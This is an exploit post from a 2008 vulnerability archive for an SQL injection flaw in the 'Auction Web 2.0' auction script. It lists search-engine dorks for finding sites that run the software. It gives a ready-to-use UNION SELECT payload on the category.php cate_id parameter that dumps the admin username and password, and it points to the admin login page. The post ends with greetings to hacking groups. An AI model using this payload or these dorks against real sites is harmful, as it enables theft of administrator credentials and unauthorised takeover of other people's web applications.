######################################################### # # Auction Web 2.0 SQL Injection Vulnerability #======================================================== # Author: Hussin X = # = # Home : www.tryag.cc/cc = # = # email: darkangel_g85[at]Yahoo[DoT]com = # hussin.x[at]hotmail[DoT]com = # = #========================================================= # HomE script : http://www.ajauctionpro.com/ajhome.php # # Demo : http://www.ajauctionpro.com/auction_web2.0/ # # DorK : Powered By AJ Auction Web # DorK : Powered By Auction Web # ########################################################## Exploit: http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin-- Admin login admin/index.php ################################################################################ #####################################( Greetz )################################# # # # tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA # # mos_chori / Rafi / FAHD / Iraq Hackers / # # # #################################(and All IRAQIs)############################### ################################################################################ # milw0rm.com [2008-06-19]